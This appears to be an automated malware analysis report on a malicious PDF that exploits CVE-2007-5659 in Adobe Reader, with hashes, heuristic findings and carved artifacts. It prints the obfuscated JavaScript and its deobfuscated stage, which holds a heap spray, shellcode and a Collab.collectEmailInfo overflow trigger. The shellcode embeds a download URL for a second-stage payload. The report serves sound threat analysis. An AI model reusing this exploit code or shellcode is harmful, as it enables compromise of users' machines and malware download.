Malicious PDF — malware analysis report

Static analysis result for SHA-256 891971f66e69730d…

MALICIOUS

PDF

4.6 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 50b0181fdaed2a9f3b1ddd7b626b3bab SHA-1: 01e841393d95933fb2920532b3865f41ad11a1bc SHA-256: 891971f66e69730d9f2089ed12469bb3359ff459c7f098bc133cb4045cc7a3dd
290 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits CVE-2007-5659 in Adobe Reader. The deobfuscated JavaScript contains a URL, http://abb192.cn/spl3/load.php?id=331&spl=4, which is likely used to download and execute a second-stage payload. The ML classifier strongly indicates maliciousness.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/spl3/load.php?id=331&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x367 6342 bytes
SHA-256: 3e4669ceff278116a436790fdbfdd40d183f5e111afe78e0fd976c8d2282ff51
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function XiVJY2Fik(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function aDwmV0OiP(FRGxfiO7L){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(FRGxfiO7L)"+";"+"}");eval("function CJbdQfE9(tuL1dtZSI){var WaocK7Zf="+"0,rkwsYNDKDzj=tuL1dtZSI.l"+"en"+"gth,H4QyT7Db=10"+"2"+"4,XWUgAOGcg9F,R91RL,KL5Vg8web3s='',DXjgEu=WaocK7Zf,OXkdmCiuCA=WaocK7Zf,RqccLIjHxL=WaocK7Zf,aYWNHCcCG8j2k=Ar"+"ra"+"y(63,54,40,39,43,10,46,34,21,18,0,0,0,0,0,0,30,23,5,59,32,33,27,13,16,28,61,48,36,58,3,19,15,14,7,62,0,17,55,42,8,47,24,0,0,0,0,29,0,25,49,51,37,38,31,45,20,35,22,12,56,60,26,57,53,50,9,4,2,1,52,11,44,6,41);f"+"o"+"r(R91RL=M"+"at"+"h.c"+"ei"+"l(rkwsYNDKDzj/"+"H4QyT7Db)"+";R91RL>WaocK7Zf;R91RL-"+"-){fo"+"r(XWUgAOGcg9F=Ma"+"th.m"+"in(rkwsYNDKDzj,H4QyT7Db);XWUgAOGcg9F>WaocK7Zf;XWUgAOGcg9F-"+"-,rkwsYNDKDzj-"+"-){RqccLIjHxL|"+"=(aYWNHCcCG8j2k[tuL1dtZSI.cha"+"rCod"+"eAt(DXjgEu+"+"+)-48])<"+"<OXkdmCiuCA;if(OXkdmCiuCA){KL5Vg8web3s+"+"=aDwmV0OiP"+"(157^RqccLIjHxL&"+"2"+"5"+"5);RqccLIjHxL>"+">="+"8;OXkdmCiuCA-"+"="+"2;}el"+"se{OXkdmCiuCA="+"6"+";}}"+"}return (KL5Vg8web3s);}var YSRRchy=implode('',['J6Q0Y','VCSU0g','W','G4Pb4jYvZfICJtnYciYMJ','qJ','CYc','Pop94','zJ6P','McCfMvw','0mJ','Sm','CUCgp','XAwb@V','@zbc','SvX0f','CO4Q4b1','C','vpCMc9','cmSdOFYeV4M','pOfmlVFgsC_CdyPCOim0g','PgMxQFmlPYSzA0gYyMvpCMc9cm','SdO','4os','C_C','dyPCOim0gPgMx14gD1wb','@V@zbcSv','X0','fCO4Q4et@YsC_CdyPCOim','0g','PgMx1w2J9x','VgAnmxP','Gq0','VSvWcMx6','iS063SCvPYSp1','nxO','AY4Pw','GcCA6xY94zJS','QS','z','iSCcVwb@V','@zbcS','v','X0fCO4Q','4','e1wl','J6PMcCfM','vw0mJ','6PWL','S','Y','1Q4','n','g','v14oJ6','Q0YVF','SA0mv29_mJtnYgj@4S','VW','0gMf4SFnY4c0CJ@P0WcS0GCGp','Pif','J6f_YD1wMciYCScfClACYl','7@W6eW4l7@W6eW4l7@W6eW4l7@4FiJV','l7','6467MVl7SW','4','MGz','l7@','zgSGzl','7@z','g154l7','Q','1FCW4l7Q1YeW4l7Q1fYGVl7Q1d1','5Wl7','S1','Fi','gVl7S','1','F','YJ','1l','7@','zf4','M','1l7@1F','351l','7Q1FiJ1l7SW','z7J1l','7','Q16qJ1l7QzFYn','Wl7@W','Y6g4l','7','QzFYn','Wl7','SWZigWl7Q1','FVW4l7Q1FiJVl7SWz','7J1l7SVL','1W4l7SWx','jWWl7Q1xqG4l7','@4W1','W4l7Q1','F','c','54l7Q1F','iJ','1l7QVIYMWl7SVL7JVl76W','W','jWWl','7SW2q54l','7@4','W','7G4l7Q1FcM1l7Q1','F','iJ1l7QVIYMWl7SVL7gWl76','VIAWWl7Q4g7M1l','7@4WSn1l7Q1FVn1l7Q1FiJ1l','7QV','I','YM','Wl','7','S','V','L7g4l7@4gjWWl7@4F05','4l7@','4W','jM1l7Q1F','CMVl7Q1FiJ1l7QV','IYM','Wl7S','VL6J','1l7S4ZA','WWl7','@','4','IO','MWl7@4W','7','WWl7','Q1F05zl7Q1FiJ1l7QVI','YMWl7','QV','FY','JVl7@1','W','6','M1l7QzI0WVl7SW4q5W','l','7S1WqGV','l7Q1d1','M','Wl7','Q1F','iG1l7SVx7J1l7','QzIYM','Wl7SWzMJVl7Q','1','f','cG','Vl7','Q','1ZA5Wl','7SWzSJWl7S1WSGVl7@4','W','SGzl7Q1FYn','Wl7Q1','F','iJ1','l7','@zWSJ1l','7S12eG','zl7QzFC_4l','76Wd1WWl7Q','1FiJ','1l','7S','W4','7J1l7S16qGVl','7S4I','YnWl','7S4FY','WVl7SW4','SJ','1','l76VFcGVl7','Q4','gjWWl7Q1Fi','J1l7SV','FiJ1l7QVI','Yn','W','l7@z26JVl','7','S','V47_1l7SVIYnWl7@4','W','6gWl7Q1','FA','51l7Q','1Fi','J1l7','QVIigVl7S4dMJ1l7S','V','67','J1','l76V','x954l7S4dj5V','l7Q1f','cJ1l7','@zIO','WWl7Q1F','iJ1l7QzIcn4l7SWzMJ1l','7Q16qGVl7Q1','ZA5','Wl7SWzSJ','Wl','7','S1','WSGVl7QVFV','WWl7Q','1FiJ1l7@z27','J1l7S','VW7_zl7QVIigVl7@1@C','J','Vl7','SV@CnW','l7Q','4gSgV','l76VFO5Vl7','SV@0','J1','l7QV','IYnWl7@z','26g4l7','SV','4','7GVl7SVIYnWl7@4W','6gWl7','Q1','FCgVl7Q','1FiJ1l7','Q1F','A5Wl7Q','zI','cn4l7SW','zM','J','1','l7Q','1Wq','GVl7Q1a','A5Wl7S','W','z','SJW','l7S1WSG','Vl','7S1FVWW','l7Q1FiJ1l7@z27','J1l7','SWzqn4','l7S1FcGVl','7Q1ZA','5Wl','7SWzSJWl7','S1W','SGVl','7Q','1FVWWl7Q1','FiJ','1','l7QVZi','J1l7S','Va','0_Wl7@4ZigVl7@4Zi','g','Vl7@4ZigVl','7@4ZigVl7@4','66WV','l7S','V2','7JVl7SWzSgVl7@4aC5','Wl7SVacnzl7@4F','cn4l7SW','zSG','Vl7S','Wz','1W4','l7','Q1W9M4l7SVY6nWl7SVL7','g4l7Q','z@','YnWl7SWzeg4','l7S1x9MVl7Q','1@OWWl7','SVLqWVl7','QzL','6nWl7Q','1@','CJ1l7','@1','@cWV','l','7QV4SMWl7@W','YqG1l','7S4@igVl','7@1','@0Gz','l7Q','1gq5zl7S1Fi54l7Q4a3GWl7Q','1W9MVl','7S4xS51l7Q1@iJ','4','l7Q','VFcn1','l7Q4ZV','nWl7','Q4x','e_','W','l7QzI0G4l7S','V215V','l7@4','z6','nWl7','SV26nW','l7Q1','@CJVl7@zLMM4l7Q166nWl7S
... (truncated)
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x367 2574 bytes
SHA-256: 262aafd20d6fbcffff53698f820d3f52fcdba6faaabeae22f363834dd49f4121
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var fLB7PgY6hOEZp = new Array(); function RrLCKU(YCp8lqNUbpNw1, Nh3ROQfx) { while (YCp8lqNUbpNw1.length*2<Nh3ROQfx){YCp8lqNUbpNw1 += YCp8lqNUbpNw1;} YCp8lqNUbpNw1 = YCp8lqNUbpNw1.substring(0,Nh3ROQfx/2); return YCp8lqNUbpNw1; } function f59bGS7() { var dJRN5Il = 0x0c0c0c0c; var jawqbPCIRehsJ = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u732F%u6C70%u2F33%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3333%u2631%u7073%u3D6C%u0034"); var Gbzb3MgK = 0x400000; var PEiC6Jc = jawqbPCIRehsJ.length * 2; var Nh3ROQfx = Gbzb3MgK - (PEiC6Jc+0x38); var YCp8lqNUbpNw1 = unescape("%u9090%u9090"); YCp8lqNUbpNw1 = RrLCKU(YCp8lqNUbpNw1, Nh3ROQfx); var C4vKwF16qkM = (dJRN5Il - 0x400000)/Gbzb3MgK; for (var lakGC1=0;lakGC1<C4vKwF16qkM;lakGC1++) { fLB7PgY6hOEZp[lakGC1] = YCp8lqNUbpNw1 + jawqbPCIRehsJ; } } function z6LM5xPRekZu() { var o75biMD = app.viewerVersion.toString(); o75biMD = o75biMD.replace(/\D/g,""); var IYiYYoPI = new Array(o75biMD.charAt(0),o75biMD.charAt(1),o75biMD.charAt(2)); if ((IYiYYoPI[0] == 8 && ((IYiYYoPI[1] == 1 && IYiYYoPI[2] < 2) || IYiYYoPI[1] < 1)) || (IYiYYoPI[0] == 7 && IYiYYoPI[1] < 1) || (IYiYYoPI[0] < 7)) { f59bGS7(); var V4GnQKlqm = unescape("%u0c0c%u0c0c"); while(V4GnQKlqm.length < 44952) V4GnQKlqm += V4GnQKlqm; this.collabStore = Collab.collectEmailInfo({subj: "",msg: V4GnQKlqm}); } } z6LM5xPRekZu();

Open this report in the interactive analyzer, or submit your own file for analysis.